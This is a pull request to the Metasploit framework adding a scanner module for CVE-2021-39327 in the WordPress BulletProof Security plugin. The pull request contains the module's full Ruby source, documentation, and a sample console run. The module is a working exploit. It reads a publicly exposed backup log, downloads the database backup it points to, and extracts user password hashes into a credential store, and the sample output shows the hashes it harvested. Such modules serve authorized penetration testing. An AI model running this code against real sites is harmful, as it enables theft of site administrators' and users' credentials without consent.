### PR TITLE
wordpress plugin bulletproofsecurity info disclosure (cve-2021-39327)

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -36,6 +36,7 @@ wp-mobile-edition
 boldgrid-backup
 gi-media-library
 chopslider
+bulletproof-security
 nextgen-gallery
 simple-backup
 subscribe-to-comments

--- a/documentation/modules/auxiliary/scanner/http/wp_bulletproofsecurity_backups.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_bulletproofsecurity_backups.md
@@ -1,0 +1,79 @@
+## Vulnerable Application
+
+The Wordpress plugin BulletProof Security, versions <= 5.1, suffers from an information disclosure
+vulnerability, in that the `db_backup_log.txt` is publicly accessible.  If the backup functionality
+is being utilized, this file will disclose where the backup files can be downloaded.
+After downloading the backup file, it will be parsed to grab all user credentials.
+
+## Verification Steps
+
+1. Install the plugin, create a backup job, and manually run it.
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/wp_bulletproofsecurity_backups`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should find database backup log files.
+
+## Options
+
+## Scenarios
+
+### Wordpress 5.4.4 with BulletProof Security 5.1
+
+```
+[*] Using auxiliary/scanner/http/wp_bulletproofsecurity_backups
+resource (bulletproof.rb)> set rhosts 111.111.1.111
+rhosts => 111.111.1.111
+resource (bulletproof.rb)> set verbose true
+verbose => true
+resource (bulletproof.rb)> run
+[*] Checking if target is online and running Wordpress...
+[*] Checking plugin installed and vulnerable
+[*] Checking /wp-content/plugins/bulletproof-security/readme.txt
+[*] Found version 5.1 in the plugin
+[*] Requesting Backup files
+[+] Stored db_backup_log.txt to /home/h00die/.msf4/loot/20211012183149_default_111.111.1.111_db_backup_log.tx_935521.txt, size: 12106
+[*] Pulling: /wp-content/bps-backup/backups_bd4aBHlhN9ODGQq/2021-10-11-time-8-35-42-pm.zip
+[+] Stored DB Backup 2021-10-11-time-8-35-42-pm.zip to /home/h00die/.msf4/loot/20211012183149_default_111.111.1.111_20211011time_891612.zip, size: 354673
+[*] Found user line: VALUES ( 1, 'admin', '$P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0', 'admin', 'none@localhost.com', 'http://111.111.1.111', '2020-05-30 12:39:48', '1608323285:$P$B9FDhsfhTLZfvAKt8dbgOrs5CoHDUr/', 0, 'admin' );
+[+]   Extracted user content: admin -> $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+[*] Found user line: VALUES ( 2, 'editor', '$P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/', 'editor', 'none@none.com', '', '2020-10-27 23:49:32', '1607478044:$P$BZ1kwDNNxe5QJ6ibiU4yPIBC8X5Mhv.', 0, 'editor' );
+[+]   Extracted user content: editor -> $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+[*] Found user line: VALUES ( 3, 'admin2', '$P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1', 'admin2', 'none2@none.com', '', '2020-10-27 23:49:57', '', 0, 'admin2' );
+[+]   Extracted user content: admin2 -> $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+[*] Found user line: VALUES ( 4, 'user', '$P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0', 'user', 'user@none.com', '', '2021-08-22 13:58:04', '', 0, 'user user' );
+[+]   Extracted user content: user -> $P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0
+[*] Pulling: /wp-content/bps-backup/backups_bd4aBHlhN9ODGQq/2021-10-11-time-8-35-42-pm.zip
+[+] Stored DB Backup 2021-10-11-time-8-35-42-pm.zip to /home/h00die/.msf4/loot/20211012183150_default_111.111.1.111_20211011time_324844.zip, size: 354673
+[*] Found user line: VALUES ( 1, 'admin', '$P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0', 'admin', 'none@localhost.com', 'http://111.111.1.111', '2020-05-30 12:39:48', '1608323285:$P$B9FDhsfhTLZfvAKt8dbgOrs5CoHDUr/', 0, 'admin' );
+[+]   Extracted user content: admin -> $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+[*] Found user line: VALUES ( 2, 'editor', '$P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/', 'editor', 'none@none.com', '', '2020-10-27 23:49:32', '1607478044:$P$BZ1kwDNNxe5QJ6ibiU4yPIBC8X5Mhv.', 0, 'editor' );
+[+]   Extracted user content: editor -> $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+[*] Found user line: VALUES ( 3, 'admin2', '$P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1', 'admin2', 'none2@none.com', '', '2020-10-27 23:49:57', '', 0, 'admin2' );
+[+]   Extracted user content: admin2 -> $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+[*] Found user line: VALUES ( 4, 'user', '$P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0', 'user', 'user@none.com', '', '2021-08-22 13:58:04', '', 0, 'user user' );
+[+]   Extracted user content: user -> $P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0
+[*] Pulling: /wp-content/bps-backup/backups_bd4aBHlhN9ODGQq/2021-10-11-time-8-35-42-pm.zip
+[+] Stored DB Backup 2021-10-11-time-8-35-42-pm.zip to /home/h00die/.msf4/loot/20211012183150_default_111.111.1.111_20211011time_664814.zip, size: 354673
+[*] Found user line: VALUES ( 1, 'admin', '$P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0', 'admin', 'none@localhost.com', 'http://111.111.1.111', '2020-05-30 12:39:48', '1608323285:$P$B9FDhsfhTLZfvAKt8dbgOrs5CoHDUr/', 0, 'admin' );
+[+]   Extracted user content: admin -> $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+[*] Found user line: VALUES ( 2, 'editor', '$P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/', 'editor', 'none@none.com', '', '2020-10-27 23:49:32', '1607478044:$P$BZ1kwDNNxe5QJ6ibiU4yPIBC8X5Mhv.', 0, 'editor' );
+[+]   Extracted user content: editor -> $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+[*] Found user line: VALUES ( 3, 'admin2', '$P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1', 'admin2', 'none2@none.com', '', '2020-10-27 23:49:57', '', 0, 'admin2' );
+[+]   Extracted user content: admin2 -> $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+[*] Found user line: VALUES ( 4, 'user', '$P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0', 'user', 'user@none.com', '', '2021-08-22 13:58:04', '', 0, 'user user' );
+[+]   Extracted user content: user -> $P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0
+[-] /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt not found on server or no data
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wp_bulletproofsecurity_backups) > creds
+Credentials
+===========
+
+host           origin         service             public  private                             realm  private_type        JtR Format
+----           ------         -------             ------  -------                             -----  ------------        ----------
+111.111.1.111  111.111.1.111  80/tcp (Wordpress)  admin   $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0         Nonreplayable hash  phpass
+111.111.1.111  111.111.1.111  80/tcp (Wordpress)  editor  $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/         Nonreplayable hash  phpass
+111.111.1.111  111.111.1.111  80/tcp (Wordpress)  admin2  $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1         Nonreplayable hash  phpass
+111.111.1.111  111.111.1.111  80/tcp (Wordpress)  user    $P$BR0Gg0bGfjfoywsVOQy1drT/7t6epE0         Nonreplayable hash  phpass
+```

--- a/documentation/modules/auxiliary/scanner/http/wp_bulletproofsecurity_backups.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_bulletproofsecurity_backups.md
@@ -5,6 +5,8 @@ vulnerability, in that the `db_backup_log.txt` is publicly accessible.  If the b
 is being utilized, this file will disclose where the backup files can be downloaded.
 After downloading the backup file, it will be parsed to grab all user credentials.
 
+Download it from [here](https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip)
+
 ## Verification Steps
 
 1. Install the plugin, create a backup job, and manually run it.

--- a/modules/auxiliary/scanner/http/wp_bulletproofsecurity_backups.rb
+++ b/modules/auxiliary/scanner/http/wp_bulletproofsecurity_backups.rb
@@ -1,0 +1,162 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress BulletProof Security Backup Disclosure',
+        'Description' => %q{
+          The Wordpress plugin BulletProof Security, versions <= 5.1, suffers from an information disclosure
+          vulnerability, in that the db_backup_log.txt is publicly accessible.  If the backup functionality
+          is being utilized, this file will disclose where the backup files can be downloaded.
+          After downloading the backup file, it will be parsed to grab all user credentials.
+        },
+        'Author' => [
+          'Ron Jost (Hacker5preme)', # EDB module/discovery
+          'h00die' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['EDB', '50382'],
+          ['CVE', '2021-39327'],
+          ['PACKETSTORM', '164420'],
+          ['URL', 'https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md']
+        ],
+        'Privileged' => false,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'DisclosureDate' => '2021-09-17',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def parse_sqldump_fields(line)
+    # pull all fields
+    line =~ /\((.+)\)/
+    return nil if Regexp.last_match(1).nil?
+
+    fields = line.split(',')
+    # strip each field
+    fields.collect { |e| e ? e.strip : e }
+  end
+
+  def parse_sqldump(content, ip)
+    read_next_line = false
+    login = nil
+    hash = nil
+    content.each_line do |line|
+      if read_next_line
+        print_status("Found user line: #{line.strip}")
+        fields = parse_sqldump_fields(line)
+        username = fields[login].strip[1...-1] # remove quotes
+        password = fields[hash].strip[1...-1] # remove quotes
+        print_good("  Extracted user content: #{username} -> #{password}")
+        read_next_line = false
+        create_credential({
+          workspace_id: myworkspace_id,
+          origin_type: :service,
+          module_fullname: fullname,
+          username: username,
+          private_type: :nonreplayable_hash,
+          jtr_format: identify_hash(password),
+          private_data: password,
+          service_name: 'Wordpress',
+          address: ip,
+          port: datastore['RPORT'],
+          protocol: 'tcp',
+          status: Metasploit::Model::Login::Status::UNTRIED
+        })
+      end
+      # INSERT INTO `wp_users` ( ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name )
+      next unless line.start_with?('INSERT INTO `wp_users`')
+
+      read_next_line = true
+      # process insert statement to find the fields we want
+      next unless hash.nil?
+
+      fields = parse_sqldump_fields(line)
+      login = fields.index('user_login')
+      hash = fields.index('user_pass')
+    end
+  end
+
+  def parse_log(content, ip)
+    base = nil
+    file = nil
+    content.each_line do |line|
+      if line.include? 'DB Backup File Download Link|URL: '
+        base = line.split(': ').last
+        base = base.split('/')
+        base = base[3, base.length] # strip off anything before the URI
+        base = "/#{base.join('/')}".strip
+      end
+      if line.include? 'Zip Backup File Name: '
+        file = line.split(': ').last
+        file = file.split('/').last.strip
+      end
+
+      next if base.nil? || file.nil?
+
+      vprint_status("Pulling: #{base}#{file}")
+      res = send_request_cgi({
+        'uri' => normalize_uri("#{base}#{file}")
+      })
+      base = nil
+      next unless res && res.code == 200
+
+      p = store_loot(file, 'application/zip', rhost, res.body, file)
+      print_good("Stored DB Backup #{file} to #{p}, size: #{res.body.length}")
+      Zip::File.open(p) do |zip_file|
+        zip_file.each do |inner_file|
+          is = inner_file.get_input_stream
+          sqldump = is.read
+          is.close
+          parse_sqldump(sqldump, ip)
+        end
+      end
+    end
+  end
+
+  def run_host(ip)
+    vprint_status('Checking if target is online and running Wordpress...')
+    fail_with(Failure::BadConfig, 'The target is not online and running Wordpress') unless wordpress_and_online?
+    vprint_status('Checking plugin installed and vulnerable')
+    checkcode = check_plugin_version_from_readme('bulletproof-security', '5.2')
+    fail_with(Failure::BadConfig, 'The target is not running a vulnerable bulletproof-security version') if checkcode == Exploit::CheckCode::Safe
+    print_status('Requesting Backup files')
+    ['/wp-content/bps-backup/logs/db_backup_log.txt', '/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt'].each do |url|
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, url)
+      })
+
+      # <65 in length will be just the banner, like:
+      # BPS DB BACKUP LOG
+      # ==================
+      # ==================
+      unless res && res.code == 200 && res.body.length > 65
+        print_error("#{url} not found on server or no data")
+        next
+      end
+      filename = url.split('/').last
+      p = store_loot(filename, 'text/plain', rhost, res.body, filename)
+      print_good("Stored #{filename} to #{p}, size: #{res.body.length}")
+      parse_log(res.body, ip)
+    end
+  end
+end


### PR DESCRIPTION
This PR adds an aux module against cve-2021-39327, an information disclosure vulnerability in BulletproofSecurity plugin for wrodpress.  The info disclosure is that a backup log file is publicly accessible.  If a backup job has been run, we're able to pull the location of the backup and download it.  Then process the db backup and pull out the creds.  hawtness.

## Verification

- [ ] install the vulnerable plugin, create a backup job, and run the job
- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/wp_bulletproofsecurity_backups`
- [ ] `set rhosts [ip]`
- [ ] `run`
- [ ] **Verify** you get the backup files, get the db backups, and get creds!
- [ ] **Document** looks good
